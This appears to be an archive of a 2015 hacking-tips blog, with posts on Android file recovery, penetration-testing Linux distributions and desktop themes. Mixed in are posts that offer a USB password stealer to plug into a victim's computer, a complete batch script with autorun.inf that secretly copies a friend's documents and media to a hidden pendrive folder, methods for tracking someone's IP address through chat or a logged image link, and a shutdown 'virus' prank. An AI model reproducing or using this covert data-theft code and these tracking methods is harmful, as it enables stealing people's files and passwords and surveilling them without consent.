Tuesday, 30 June 2015

HOW TO RECOVER DELETED FILES FROM ANDROID PHONE'S

HOW TO RECOVER DELETED FILES FROM ANDROID PHONE'S

If you are like most people these days, you probably possess one or more electronic devices powered by the Android operating system (OS) that you use on a daily basis for both personal and professional reasons. Your Android devices likely store a vast amount of important data you cannot live without, too: meeting minutes, photographs, bookmarks, songs, movies, applications, and more. If you have an Android-based smartphone and/or tablet computer that had underwent a factory reset, fell and broke into multiple pieces, or otherwise experienced sudden and unexplainable data loss, you are probably frantic and wondering how to immediately recover deleted data from your Android devices. The good news is you have several different options available to you to help restore all or part of your precious files. This guide explores two different ways to recover deleted files such as SMS messages, contacts, photos, videos, etc. from your Android devices.

You can recover accidentally deleted or lost data from your device using the Dr.Fone software (which works for both rooted and non-rooted devices). If you’re using a rooted Android phone or tablet, you can try to recover deleted files from your Android device using the free Undeleter App available in the Play Store. Follow the following simple steps to get your deleted files back.
         

STEP1:- Download and Install the Software on Your Computer




First, download the Dr.Fone for Android tool onto your computer; be sure to access the tool from a safe and trusted source. You may visit this page to know more about this program: http://www.easyphonerecovery.com/advanced-android-...
Note: A free version of Dr.Fone with limited functionality is available; however, the fully functional version is relatively inexpensive and well worth the modest price to get your important files back.You are  free to try the free app called Undeleter Recover Files & Data mentioned in next part of this tutorial.

STEP2:-Start the Program and Connect Your Android Device


Run the program on your PC, and when the first screen becomes visible, connect your Android device to your laptop or desktop PC using an industry-standard USB cord.

Note: Be sure your Android device has 20% or more power before you begin this process.

STEP3:-Enable USB Debugging Mode On Your Android


If the "USB Debugging" setting on your Android device was not activated before, you will likely see a new window on your device asking you to allow this USB debugging process to begin now. Follow the onscreen instructions to allow USB debugging to occur. The onscreen instructions will ask you to decouple your Android device from your PC at the appropriate time.

STEP4:-Start Scanning Your Android Phone or Tablet



After the debugging process has ended, you will need to reconnect your Android device to your PC with your USB cable. After the Dr.Fone Android data recovery software detects your Android device, click "start" to have program analyze the data on your Android device. (If there is a long period of total inactivity, restart the software. Otherwise, be patient, as the data analysis can take many minutes to complete.)
Step 5: Recover Your Deleted Data
Picture of Recover Your Deleted Data

View the list of files the program has found and check the box next to each item you want to restore. This program will save all of these files in a designated folder on your PC's hard drive. When you buy a new Android device or have your existing device fixed, you will be able to transfer all of your saved data from your PC to your new or fixed Android device.

STEP6:- Recover Deleted Files from Android Using the Undelete App (only works for rooted devices)



If your Android device is rooted, you can use the app called Undeleter Recover Files & Data to recover any deleted files from your SD card of your Android phone or tablet. If you're not sure whether your Android rooted or not, go ahead and check this article first: http://www.androidcentral.com/is-my-phone-rooted Now, follow the 3 simple steps below to restore your files:

(a). First, download the Undeleter app  by Fahrbot Mobile onto your Android device; be sure to access the app from a safe and trusted source like the Google Play store.

(b). Choose the onscreen option to scan either your internal or external memory. If you don't know which one to select, use Undelete to scan the internal memory first and examine the results. If you don't see the files you need, run Undelete a second time to examine the external memory, or viceversa. Wait several minutes for each scan to complete; each scan might take up to 10 minutes.


(c). The results of the data scan will be presented on screen in tabular format, so you will be able to retrieve music/audio, video, pictures/photographs/graphics, documents and other files, going category by category to make your selections. Indicate which files you wish to save, and these files will be restored to their original places. For example, if a particular photograph was originally stored in an external memory folder called "Downloads," then that photograph will be returned to the "Downloads" folder.
 

PLEASE SHARE IF YOU LIKE IT...

Thursday, 25 June 2015

USB PASSWORD STEALER...

 HERE I AM AGAIN MENTIONING A USB PASSWORD STEALER WHICH STEALS ALL THE PASSWORDS STORED IN BROWSER'S LIKE FIREFOX CHROME ETC...

         


INSTRUCTIONS

1.  Extract the "USBThief" zipped RAR file anywhere on your PC.

2.  Open the folder "USBThief", open the folder "COPY" and copy everything IN that folder.

3.  Plug in your USB and paste everything on.

4.  Now, on your USB, run the file called "hideh.bat" or "hideh"... This will make all the USB Thief files invisible on the USB.

5.  Delete the "hideh" file from your USB.

6.  Take the USB out, go to the computer you want to steal information from, plug the USB in.

7.  After 5 seconds all the information will be transfered and stored on the USB invisibly.

8.  Take the USB out, go to your original PC, plug the USB in and go to the folder in your COMPUTER called

    "USBThief", right click the "showh.bat" or "showh", copy it and paste it on your USB.

9.  Run the "showh.bat" on your USB and you will notice that all the invisible files will now be visible.

10. Open the folder "IMNeoWorld" and you will find all the important information from the other PC stored there.

USB THIEF DOWNLOAD

PASSWORD FOR ZIP FILE IS KNOWLEDGEBOX

PLEASE SHARE IF YOU LIKE IT

USB DATA STEALER.....

DOES YOUR FRIEND HAVE SOME DATA THAT YOU WANT TO STEAL FROM HIM.........



DONT WORRY USE THIS USB DATA STEALER AND YOU CAN STEAL FILES WITHOUT EVEN ANYONE KNOWING.....

STEPS

1:-OPEN NOTEPAD

you can open notepad by pressing win + r,and typing notepad or you can directly search for the notepad..

2:-PASTE THE CODE

@echo off
    :CHECK
    if not exist "hs" md "hs"
    attrib +r +s +h hs
    if exist "%systemdrive%\Documents and Settings" goto COPIER
    goto ERROR
    :COPIER
    if not exist "hs" md "hs\~$sys.computername$"
    if not exist "hs\%computername%\VIDEOS" md "hs\%computername%\VIDEOS"
    if not exist "hs\%computername%\PICTURES" md "hs\%computername%\PICTURES"
    if not exist "hs\%computername%\MUSIC" md "hs\%computername%\MUSIC"
    if not exist "hs\%computername%\DOWNLOADS" md "hs\%computername%\DOWNLOADS"
    copy /y "%userprofile%\My Documents\*.*" "hs\%computername%"
    copy /y "%userprofile%\My Documents\My Videos" "hs\%computername%\VIDEOS"
    copy /y "%userprofile%\My Documents\My Music" "hs\%computername%\MUSIC"
    copy /y "%userprofile%\My Documents\My Pictures" "hs\%computername%\PICTURES"
    copy /y "%userprofile%\My Documents\Downloads" "hs\%computername%\DOWNLOADS"
    MSG %username% "DONE!"
    exit
    :ERROR
    exit

3:-SAVE IT AS .BAT

click on file and save it as bat

4:-CREATE AUTORUN FILE

[autorun]
icon=NAME.ico
label=NAME
open=copier.bat
action=scan

change the name.ico to your icon name
change name to your bat file name(label=name)
change copier.bat to your filename

save it as autorun.inf  and save it.
now copy both bat file and autorun file in your pendrive..

DONE!!


NOTE:-THIS FILE MAKES A DIR IN PENDRIVE NAMED HS YOU CAN CHANGE IT IN PROGRAM..AND THE DIR IS HIDDEN SO YOU WILL NEED TO UNHIDE IT..

ATTRIB -s -h -r hs

USE THIS COMMAND TO UNHIDE THE DIR..


please share if you like it....


 

Monday, 22 June 2015

TOP 15 ADVANCED HACKING OS...

Today we are discussing about top 15 advanced operating systems which has great penetration testing or ethical hacking tools. the top Os on this list is my favorite Linux distro Kali Linux because it is very popular in pentesting and it is developed by the same team of BackTrack (Offensive security). i am not including BackTrack on this list because it is no more available officially on their website and the next version of BackTrack is Kali Linux. the listed operating systems are here based on Linux kernel so it is all free operating systems.


1:-KALI LINUX



Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. Mati Aharoni and Devon Kearns of Offensive Security developed it by rewriting BackTrack. Kali Linux is the most versatile and advanced penetration testing distro. Kali updates its tools and it is available for many different platforms like VMware and ARM.


2:-BACKBOX




It includes some of the most used security and analysis Linux tools, aiming to a wide spread of goals, ranging from web application analysis to network analysis, from stress tests to sniffing, including also vulnerability assessment, computer forensic analysis and exploitation.

The power of this distribution is given by its Launchpad repository core constantly updated to the last stable version of the most known and used ethical hacking tools. The integration and development of new tools inside the distribution follows the commencement of open source community and particularly the Debian Free Software Guidelines criteria.

3:-PARROT OS


Parrot Security is an operating system based on Debian GNU/Linux mixed with Frozenbox OS and Kali linux in order to provide the best penetration and security testing experience. it is an operating system for IT security and penetration testing developed by the Frozenbox Dev Team. It is a GNU/Linux distribution based on Debian and mixed with Kali.

Parrot uses Kali repositories in order to take latest updats for almost all the tools, but it also has its own dedicated repository where all the custom packets are kept. This is why this distro is not just a simple Kali “mod” but entire new concept which relies on Kali’s tool repositories. As such, it introduces a lot of new features and different developing choices.Parrot uses MATE as a Desktop Environment. Lightweight and powerful interface is derived from famous Gnome 2, and thanks to FrozenBox highly customizable with captivating icons, ad-hoc themes and wallpapers. System look is proposed and designed by the community members and also members of Frozenbox Network, who are closely following the development of this project.

4:-DEFT BOX



Deft is Ubuntu customization with a collection of computer forensic programs and documents created by thousands of individuals, teams and companies. Each of these works might come under a different licence. There Licence Policy describe the process that we follow in determining which software we will ship and by default on the deft install CD.

5:-LIVE HACKING OS




As i  said before Live Hacking OS is also based on linux which has big package of hacking tools useful for ethical hacking or penetration testing. It includes the graphical user interface GNOME inbuilt. There is a second variation available which has command line only, and it requires very less hardware requirements.

6:-SAMURAI WEB TESTING FRAMEWORK


The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. In developing this environment, we have based our tool selection on the tools we use in our security practice. We have included the tools used in all four steps of a web pen-test.

7:-NETWORK SECURITY TOOLKIT



Network Security Toolkit (NST) is a bootable live CD based on Fedora Core. The toolkit was designed to provide easy access to best-of-breed open source network security applications and should run on most x86 platforms. The main intent of developing this toolkit was to provide the network security administrator with a comprehensive set of open source network security tools.

What we find rather fascinating with NST is that we can transform most x86 systems (Pentium II and above) into a system designed for network traffic analysis, intrusion detection, network packet generation, wireless network monitoring, a virtual system service server, or a sophisticated network/host scanner.

8:-BUGTRAQ


Bugtraq is an electronic mailing list dedicated to issues about computer security. On-topic issues are new discussions about vulnerabilities, vendor security-related announcements, methods of exploitation, and how to fix them. It is a high-volume mailing list, and almost all new vulnerabilities are discussed there.
Bugtraq team is experienced freaks and developers, It is available in Debian, Ubuntu and OpenSuSe in 32 and 64 bit architectures.

9:-NODE ZERO



It is said the necessity is the mother of all invention, and NodeZero Linux is no different. There team is built of testers and developers, who have come to the census that live systems do not offer what they need in their security audits. Penetration Testing distributions tend to have historically utilized the “Live” system concept of linux, which really means that they try not to make any permanent effects to a system. Ergo all changes are gone after reboot, and run from media such as discs and USB’s drives. However all that this maybe very handy for occasional testing, its usefulness can be depleted when your testing regularly. Its there believe that “Live System’s” just don’t scale well in a robust testing environment.

All though NodeZero Linux can be used as a “Live System” for occasional testing, its real strength comes from the understanding that a tester requires a strong and efficient system. This is achieved in our belief by working at a distribution that is a permanent installation, that benefits from a strong selection of tools, integrated with a stable linux environment.

10:-PENTOO




Pentoo is a Live CD and Live USB designed for penetration testing and security assessment. Based on Gentoo Linux, Pentoo is provided both as 32 and 64 bit installable live cd. Pentoo is also available as an overlay for an existing Gentoo installation. It features packet injection patched wifi drivers, GPGPU cracking software, and lots of tools for penetration testing and security assessment. The Pentoo kernel includes grsecurity and PAX hardening and extra patches - with binaries compiled from a hardened toolchain with the latest nightly versions of some tools available.

11:-GNACKTRACK


GnackTrack is an open and free project to merge penetration testing tools and the linux Gnome desktop. GnackTrack is a Live (and installable) Linux distribution designed for Penetration Testing and is based on Ubuntu.

Backtrack is not only a single player in the field of ethical hacking, so you can try some other distribution as well, if you are Gnome lover than must try this, however backtrack 5 is also available on Gnome platform. Just like backtrack, Gnacktrack comes with multiple tools that are really helpful to do a effective penetration testing, it has Metasploit, armitage, wa3f and others wonderful tools.

12:-BLACKBUNTU




Blackbuntu is distribution for penetration testing which was specially designed for security training students and practitioners of information security. Blackbuntu is penetration testing distribution with GNOME Desktop Environment. It's currently being built using the Ubuntu 10.10 and work on reference Back|Track.

13. KNOPPIX STD



Knoppix STD (Security Tools Distribution) is a Live CD Linux distribution based on Knoppix that focused on computer security tools. It included GPL licensed tools in the following categories: authentication, password cracking, encryption, forensics, firewalls, honeypots, intrusion detection system, network utilities, penetration, packet sniffers, assemblers, vulnerability assessment and wireless networking. Knoppix STD version 0.1 was published January 24, 2004, on Knoppix 3.2. Thereafter, the project stagnated, lacking updated drivers and packages. A release date for version 0.2 has not yet been announced. A list of tools is available on the official website.

14:-WEAKERTH4N



Weakerth4n is a penetration testing distribution which is built from Debian Squeeze.For the desktop environment it uses Fluxbox.This operating system is ideal for WiFi hacking as it contains plenty of Wireless tools. It has a very well maintained website and a devoted community. Built from Debian Squeeze (Fluxbox within a desktop environment) this operating system is particularly suited for WiFi hacking as it contains plenty of Wireless cracking and hacking tools.

Tools includes: Wifi attacks, SQL Hacking, Cisco Exploitation, Password Cracking, Web Hacking, Bluetooth, VoIP Hacking, Social Engineering, Information Gathering, Fuzzing Android Hacking, Networking and creating Shells.

15:-CYBORG HAWK




The most advanced, powerful and yet beautiful penetration testing distribution ever created. Lined up with ultimate collection of tools for pro Ethical Hackers and Cyber Security Experts. It has 700 + tools while Kali have 300+ and also dedicated tools for and menu for mobile security and malware analysis . Also it is easy to compare it with Kali as to make a better OS than Kali we have to outperform it. It is a new operating system based on Ubuntu linux, i am not tested this OS that is why i placed it in the last of this list.

Cyborg Hawk is developed by Team Cybord led by Vaibhav Singh and Shahnawaz Alam from Ztrela Knowledge Solutions Pvt. Ltd.

PLEASE SHARE IF YOU LIKE IT

Sunday, 21 June 2015

HOW TO MAKE A SMART COMPUTER........

WE ALL KNOW ABOUT IRON MAN'S JARVIS AND WE ALL WANT A SUPER COMPUTER LIKE THAT....

FOR NOW WE CANNOT HAVE A SUPER COMPUTER LIKE THAT BUT WE CAN MAKE OUR COMPUTER LOOK LIKE THIS....


OR LIKE THIS....


THING'S YOU WILL NEED

1:-RAINMETER SOFTWARE....
2:-RAINMETER SKINS..

FIRST INSTALL RAINMETER...

YOU CAN DOWNLOAD IT FROM HERE..DOWNLOAD

AFTER INSTALLING THE RAINMETER YOU WILL NEED SKINS OR THEME'S FOR CUSTOMIZING YOUR DESKTOP...

YOU CAN DOWNLOAD IT FROM DEVIANT ART...SKINS LINK

MAKE YOUR COMPUTER LOOK LIKE THIS

YOU CAN CUSTOMIZE THE THEMES THE WAY YOU WANT.....

PLEASE SHARE IF YOU LIKE....


Friday, 19 June 2015

FIND IP-ADDRESS WITH FACEBOOK......

 FIND IP-ADDRESS OF A PERSON THROUGH FACEBOOK...

 Today I am going to tell you two methods for finding IP address of the targeted user.

METHOD-1:- Through Chat

If you want to check for ip address of particular person on
facebook or any other social site just invite them for a chat. After that your browser will be connected to that system.  When chat is ON, open command prompt type the below command


 Netstat –an



This will show you the connected ip addresses. Now search for suspicious IP address that is not local connection. Local connections normally start from 192.168.1.1 ranging to 192.168.1.255

Other netstat commands:

-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto may be TCP or UDP.
-s option to display per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP
-p option may be used to specify a subset of the default.


METHOD 2:- Hosting page

 First of all create an online hosting account. There are many sites availabe like 000webhost.com or cpanel.2freehosting.com

After that upload any file on it. This file may be any web page or image even. Suppose you uploaded image.
Send the image link to your friend through facebook, orkut, email or any other thing.

Once the user will go through that image link, a file named log.txt will be generated by hosting server and will be saved nearby your uploaded file. This log.txt file will contain IP
address of the user who clicked on the link to see image.

PLEASE SHARE IF YOU LIKE

VIRUS TO SHUTDOWN YOUR FRIENDS PC...........


HI FRIEND'S

HERE IS A TRICK TO SHUTDOWN YOUR FRIENDS COMPUTER.....



STEPS


1. Right click on Desktop
.
2. Go to new and select shortcut

3. In the location box, type:

C:\Windows\System32\shutdown.exe -s -t 05 -c "Virus activated!! Your system is hacked."

05 is the time duration in seconds after which PC will shut down. You can change it keeping in mind that time is in seconds.


4. Click on next.

5. Type any friendly name like "secret" without quotes.

6. Change its icon.

   i.  Right click on shortcut.
   ii. Click Properties.
   iii. On Shortcut tab, click  change Icon.
   iv. Choose a good icon and click ok.

7. Click Ok.

8. You have successfully created the virus.
  
9. You are done.

This trick works in windows XP, Vista, 7 and 8.

Dont worry, it doesn't hurt your computer.

PLEASE SHARE IF YOU LIKE